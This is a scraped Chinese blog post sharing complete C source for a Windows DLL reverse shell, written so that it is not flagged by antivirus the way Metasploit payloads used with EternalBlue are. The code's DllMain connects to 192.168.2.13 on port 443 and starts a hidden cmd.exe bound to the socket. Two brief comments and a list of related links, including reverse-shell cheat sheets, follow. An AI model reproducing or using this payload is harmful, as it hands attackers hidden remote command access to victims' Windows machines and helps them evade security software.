reverse shell dll 源码
来源:互联网 发布:支付宝和淘宝什么关系 编辑:程序博客网 时间:2024/06/08 03:06
前段时间,永恒之蓝 很火,msf生成的 dll 很容易被杀,网上找了一份反弹 的代码反弹代码拼凑了一个 dll反弹版
#pragma comment(lib,"Ws2_32.lib")#include <WinSock2.h>#include <stdlib.h> WSADATA wsaData;SOCKET Winsock;SOCKET Sock;struct sockaddr_in hax;STARTUPINFO ini_processo;PROCESS_INFORMATION processo_info;BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){ WSAStartup(MAKEWORD(2, 2), &wsaData); Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); hax.sin_family = AF_INET; hax.sin_port = htons(atoi("443")); hax.sin_addr.s_addr = inet_addr("192.168.2.13"); WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL); memset(&ini_processo, 0, sizeof(ini_processo)); ini_processo.cb = sizeof(ini_processo); ini_processo.dwFlags = STARTF_USESTDHANDLES; ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, (LPSTARTUPINFOA)&ini_processo, &processo_info); return TRUE;}
使用 gcc 编译(mingw ) 如下:
2 回复
我这边也找了好几个
@ver007 你也在这里啊
阅读全文
0 0
- reverse shell dll 源码
- Reverse Shell with Bash
- Reverse Shell Cheat Sheet
- Reverse Shell Cheat Sheet
- Reverse Shell Cheat Sheet
- php-reverse-shell
- Php reverse shell with netcat
- 一对简单的 reverse shell / shell
- shell externsion DLL模块
- StringBuffer中的reverse源码分析
- JDK源码学习--AbstractStringBuilder reverse()
- 转载 udf.dll 源码
- NetRipper源码のDLL
- [python] 0x2 Python Tutorial: Reverse Shell
- LeetCode-Evaluate Reverse Polish Notation[AC源码]
- STL源码—list transfer merge reverse
- 精典shell源码(1)
- 一个SHELL源码
- caffe 学习笔记之Makefile.config注释
- Windows 7便签程序
- Windows 10下mysql 64位 安装(mysql-5.7.11-winx64安装)
- 全栈开发——动手打造属于自己的直播间(Vue+SpringBoot+Nginx)
- python-期货指数的单位根检验
- reverse shell dll 源码
- Elasticsearch源码编译运行
- 巧用spring进行测试InitializingBean
- JAVA中Double,如何才能不显示成科学计数法
- CAN总线错误帧
- checkbox在jquery版本1.9 以上用attr不可重复操作的问题
- URL 解析公共类,源码自:com.alibaba.dubbo.common
- Path Sum
- 网卡接收数据流程